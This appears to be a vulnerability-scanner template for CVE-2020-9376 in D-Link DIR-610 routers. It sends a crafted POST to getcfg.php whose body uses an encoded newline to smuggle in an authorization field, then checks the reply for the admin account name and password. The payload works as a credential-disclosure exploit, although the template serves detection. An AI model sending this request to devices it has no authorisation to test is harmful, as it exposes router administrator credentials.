id: CVE-2020-9376

info:
  name: D-Link Information Disclosure via getcfg.php
  author: whynotke
  severity: high
  description: |
    D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
    NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

    References:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9376
  tags: cve,cve2020,dlink
requests:
  - method: POST
    path:
      - "{{BaseURL}}/getcfg.php"

    body: SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<name>Admin</name>"
          - "</usrid>"
          - "</password>"
        condition: and
        part: body